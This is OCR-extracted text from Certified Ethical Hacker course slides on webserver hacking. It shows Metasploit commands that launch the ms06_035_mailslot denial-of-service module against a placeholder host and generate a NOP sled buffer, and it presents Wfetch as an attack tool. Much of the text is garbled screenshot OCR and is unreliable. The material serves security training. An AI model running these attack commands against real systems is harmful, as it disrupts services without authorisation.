  63. 63. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers _J Metasp| oit’s auxiliary modules can be used to perform arbitrary, one— off actions such as port scanning, denial of service, and even fuzzing & A To run auxiliary module, either use the run command, or use the exploit command RHOST = > 1.2.3.4 msf auxiliary (InsO6_035_mai1s1ot) > run msf > use dos/ windows/ smb/ nLs06_035_mai1s1ot: msf auxiliary(lns06_035_mai1s1ot) > set RHOST 1.2.3.4 ['1 Mangling the kernel, two bytes at a time. .. Copyright 0 by 3-Ciil. All Rights Reserved. Reproduction is Strictly Prohibited. s Metasploit Auxiliary Module Metasp| oit’s auxiliary modules can be used to perform arbitrary, one-off actions such as port scanning, denial of service, and even fuzzing. To run auxiliary module, either use the run command or use the exploit command. -‘ V Command Prompt msf > use dos/ windows/ smb/ ms06_035_mailslot msf auxiliary (ms06_035_mailslot) > set RHOST 1.2.3.4 RHOST = > 1.2.3.4 msf auxiliary (ms06_035_mailslot) > run [*] Mangling the kernel, two bytes at a time. .. FIGURE 12.24: Metasploit Auxiliary Module Module 12 Page 1662 Ethical Hacking and Countermeasures Copyright © by [G-Gfififl All Rights Reserved. Reproduction is Strictly Prohibited.
  64. 64. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers I 1 .13. . - 1_'l_li;1il'2_Ii:1_'; r‘_i9)_iI JV“ 1} 5‘ ~ 1_'l_luIo'_li| L{tt. ~ li'I_: f Z. _ NOP modules generate a no~operation instructions used for blocking out buffers Use generate command to generate a NOP sled of an arbitrary size and display it in a given format OPTIONS: —b <opt>: The list of characters to avoid: 'x0Oxff' , , e -11: Help banner. -5 <opt>: The comma separated list of registers to save. F 3 1' —t <opt>: The output type: ruby, perl, c, or raw msf nop (opty2) > To generate .1 50 byte NOP sled that is displayed as .1 C—stv| e buffer, run me following (orr1m. ‘Jr1d' Generates a NOP sled of a given length ‘E: Command Prompt JV V. -Jun inn. -I3xH'5‘f . ,. -fl v. :‘l'I": lh5ii(¥H>Il'Ai5Iilifilflltl‘l'| il'ZI"«$11iT! ii"VI'lmni(-(ti L4L_J _ —~ _ Metasploit NOPS Module . _.l_. _ Metasploit NOP modules are used to generate no operation instructions that can be used for padding out buffers. The NOP module console interface supports generating a NOP sled of an arbitrary size and displaying it in a given format. OPTIONS: -b <opt> The list of characters to avoid: ?x0Oxff? -h Help banner. -5 <opt> The comma separated list of registers to save. -t <opt> The output type: ruby, perl, c, or raw. Generates a NOP sled of a given length Module 12 Page 1663 Ethical Hacking and Countermeasures Copyright © by [C-Cullllcll All Rights Reserved. Reproduction is Strictly Prohibited.
  65. 65. Ethital Hatking and Countermeasures Exam 31250 Certified Ethical Ha(ker Hacking Webservers Command Prompt msf > use X86/opty2 msf nop(opty2) > generate -h Usage: generate [options] length To generate a 50-byte NOP sled that is displayed as a C-style buffer, run the following command: Command Prompt msf nop(opty2) > generate -t c 50 unsigned char buf[] = " xf5x3dx05x15xf8x67xbax7dx08xd6x6 6x9fxb8x2dxb6" " x24xbexb1x3fx43x1dx93xb2x37x3 5x8 4xd5x14x40xb4 " " xb3x41xb9x48x04x9 9x4 6xa9xb0xb7x2 fxfdx96x4ax98" "x92xb5xd4x4fx91" ; msf nop (opty2) > Figure 12.25: Metasploit NOPS Module Module 12 Page 1064 Ethical Hacking and Countermeasures Copyright (C) by [G-Golllcll All Rights Reserved. Reproduction is Strictly Prohibited.
  66. 66. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers Weijo in : -a_%. * +1:-i-.2‘ _'4_ -‘i. ‘vr—-. _n«»; :4_l«. : Llie - ei_i~rIe: ‘I '15-: ‘ie‘~l. ‘r. i *6 WFetch allows attacker to fully customize an HTTP request and send it to a Web server to see the raw HTTP request and response data It allows attacker to test the performance of Web sites that contain new elements such as Active Server Pages (ASP) or wireless protocols _, . 8 wie? Cr—WtE‘. c'l l-l‘= 'i * 1 ”‘ 5|. gar: grew gmaew gel; r" I l f ( l . ..'. V/ ietrhl - u x '-I» - r we GET j| _v1 llvcaltol Lay idol L~. ._. ll L 0;: °‘‘‘“: ], hm‘! Pat - Mthew1r: aIrorr Lomecnm _ l gun Imwr me _~ gumett rw - l i ‘ ; Qorvari I ope V "'33: L ‘ gm 1 O-enicev i so” ' * . _—. ream] ' m. _, D Em. log OutPut_'L. I:LStatg: Eoomemi sum t-re. r- mm 9 r. o l 0 . 0 T‘ < H 4.531» NUM http: //wwwmicrosoftcom U. -1-1ii‘:2r‘iI. -I31'H'5‘i . ,. "llV. :llIillilh5‘i(3H>ll'AilIilH! lI'l'l‘l'| il'iI"«$11il! ll"VI'lfllai(-(‘l Web Server Attack Tools: Wfetch Source: http: [[www. microsoft. com Wfetch is a graphical user-interface aimed at helping customers resolve problems related to the browser interaction with Microsoft's IIS web server. It allows a client to reproduce a problem with a lightweight, very HTTP-friendly test environment. it allows for very granular testing down to the authentication, authorization, custom headers, and much more. Module 12 Page 1665 Ethical Hacking and Countermeasures Copyright © by [C-Clrlliicll All Rights Reserved. Reproduction is Strictly Prohibited.
  67. 67. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Hacking Webservers 8 wletch-Wletchi - ° " Erie ---1 Wletchi - II It , ,— » - -- ~ - Ad ed Re -. - tm ie= T 3 as rm: 3am r= .~~3». ~ ii 1 3 , ;'—*? “"° . r . _.. .i. , P313 l L] A. ‘."veNt: oboo Coma-cton ; _'l. .~. -r r5norr)t'ous ' gunned r*‘. :> ' 1, ll e Ti T Don-an Cflher ' prxgafl gm Crevice-t _l; Sock‘ Passwd F p, .,, :,_ is EM, _LYg9 Output [Last sum. 500 Internal Serverirror] » ‘1 zurted. .. 9 6 6 . 9 Ready 7 NUM 7 Figure 12.26: Wfetch Screenshot Module 12 Page 1666 Ethical Hacking and Countermeasures Copyright © by [G-culincil All Rights Reserved. Reproduction is Strictly Prohibited.

×